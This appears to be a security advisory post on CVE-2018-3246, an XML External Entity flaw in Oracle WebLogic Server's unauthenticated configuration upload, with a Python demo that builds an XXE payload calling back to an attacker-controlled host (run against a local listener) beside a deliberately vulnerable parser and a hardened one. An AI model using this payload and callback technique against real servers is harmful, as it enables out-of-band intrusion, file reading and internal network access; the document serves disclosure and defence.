Oracle WebLogic Server XML External Entity Vulnerability (CVE-2018-3246)

Oracle has addressed several WebLogic Server vulnerabilities in its latest Critical Patch Update. In this post we discuss one of the critical ones, CVE-2018-3246, an XML External Entity (XXE) vulnerability that affects Oracle WebLogic Server versions 12.1.3.0 and 12.2.1.3.

Vulnerability Analysis:

The vulnerability exists in a component that lets users upload configuration files in XML format. The upload handler parses the submitted file with external entity resolution enabled: a malformed XML document makes the server throw an error, and a document that declares an external entity makes the server resolve it, which means connecting to whatever host the entity's SYSTEM identifier names.

[Screenshot: malformed request and the server's error response]

Let's create a simple file upload form and submit the request to the WebLogic server:

[Screenshot: WebLogic-Upload.html, the upload form]

Let's capture this request in Burp Suite and replace the uploaded file with an XML document whose external entity points at our attacking IP on port 443. The server's response confirms that it did try to connect there:

and we now have an inbound connection from the WebLogic server on our attacking IP:
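The upload-and-callback experiment above, as an added example that is not code from the original post or from Oracle: it builds the XML the attacker would upload (the external entity's SYSTEM identifier points at the attacker's listener, https://<attacker-ip>:443/ in the post), wraps it the way the simple HTML form would, and feeds it to a parser that resolves external entities, which is what the unpatched upload handler effectively does, next to a parser that rejects any DOCTYPE. A throwaway HTTP listener on 127.0.0.1 plays the attacking host so the whole thing runs offline. The form field name, file name, root element name and entity name are assumptions, not WebLogic's own.

```python
import socket
import threading
import urllib.request
from xml.parsers import expat


def build_xxe_payload(callback_url: str) -> bytes:
    """The 'configuration file' the attacker uploads.  A parser that resolves
    external entities connects to callback_url the moment it reaches &probe;.
    Root element 'config' and entity name 'probe' are assumptions."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE config [\n'
        b'  <!ENTITY probe SYSTEM "' + callback_url.encode() + b'">\n'
        b']>\n'
        b'<config>&probe;</config>\n'
    )


def build_multipart_upload(field_name: str, filename: str, content: bytes,
                           boundary: str = "----xxe-demo-boundary"):
    """(Content-Type value, body) for a single-file form post, the shape a
    browser produces from <input type="file">.  Field and file names are
    placeholders, not WebLogic's real parameter names."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field_name}"; '
            f'filename="{filename}"\r\nContent-Type: text/xml\r\n\r\n').encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


class CallbackListener:
    """Stand-in for the attacker's listener: accepts one HTTP connection on
    127.0.0.1, records the request line, answers with a tiny body."""

    def __init__(self):
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))      # any free loopback port
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.request_line = None
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn:
            raw = conn.recv(4096)
            self.request_line = raw.split(b"\r\n", 1)[0].decode(errors="replace")
            body = b"pwned"
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n"
                         b"Content-Length: %d\r\nConnection: close\r\n\r\n"
                         % len(body) + body)
        self.sock.close()


def vulnerable_parse(doc: bytes) -> str:
    """What the unpatched handler effectively does: every external entity is
    fetched from its SYSTEM identifier and spliced into the document."""
    text = []
    parser = expat.ParserCreate()
    # Proxy-free opener so the demo's request really reaches our listener.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))

    def fetch_external_entity(context, base, system_id, public_id):
        with opener.open(system_id, timeout=5) as resp:   # the outbound hit
            fetched = resp.read()
        child = parser.ExternalEntityParserCreate(context)  # inherits handlers
        child.Parse(fetched, True)
        return 1

    parser.ExternalEntityRefHandler = fetch_external_entity
    parser.CharacterDataHandler = text.append
    parser.Parse(doc, True)
    return "".join(text)


def hardened_parse(doc: bytes) -> str:
    """Fail closed: an uploaded configuration file has no business carrying a
    DOCTYPE, so reject it before any entity can be declared.  No
    ExternalEntityRefHandler is installed either, so expat would skip rather
    than fetch a reference that somehow got through."""
    text = []
    parser = expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError(f"DOCTYPE '{name}' not allowed in uploaded configuration")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = text.append
    parser.Parse(doc, True)
    return "".join(text)


def run_probe() -> dict:
    """Both sides of the post's experiment against the local listener."""
    listener = CallbackListener()
    payload = build_xxe_payload(f"http://127.0.0.1:{listener.port}/xxe")
    content_type, _body = build_multipart_upload("configFile", "config.xml", payload)
    spliced = vulnerable_parse(payload)       # triggers the outbound connection
    listener.thread.join(timeout=5)
    try:
        hardened_parse(payload)
        blocked = False
    except ValueError:
        blocked = True
    return {"upload_content_type": content_type,
            "callback_request_line": listener.request_line,
            "spliced_text": spliced.strip(),
            "blocked_by_hardened_parser": blocked}


if __name__ == "__main__":
    for key, value in run_probe().items():
        print(f"{key}: {value}")
```

Running it prints the request line the listener received, which is the same observation as the screenshot above: the server's parser, not the attacker, opened the connection, so an XXE probe needs nothing more than a listener on a host the server can reach. The scheme and port in the entity are the attacker's choice; the post used 443 because outbound HTTPS is rarely filtered. For a Java server the equivalent of hardened_parse is disallowing DOCTYPE declarations and external general/parameter entities on the DocumentBuilderFactory or SAXParserFactory before touching uploaded XML; for WebLogic itself the fix is Oracle's patch.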

Conclusion:

The upload requires no authentication, so a remote attacker who can reach the server over HTTP can make it resolve external entities of the attacker's choosing. The demonstration above shows the server connecting out to an attacker-controlled host; XXE flaws of this kind are also routinely used to read files from the server's filesystem and to reach internal services that the server itself can see. Customers are advised to scan their network for QID#87368 and QID#371264 to find vulnerable WebLogic Servers and apply the patches from the Critical Patch Update.
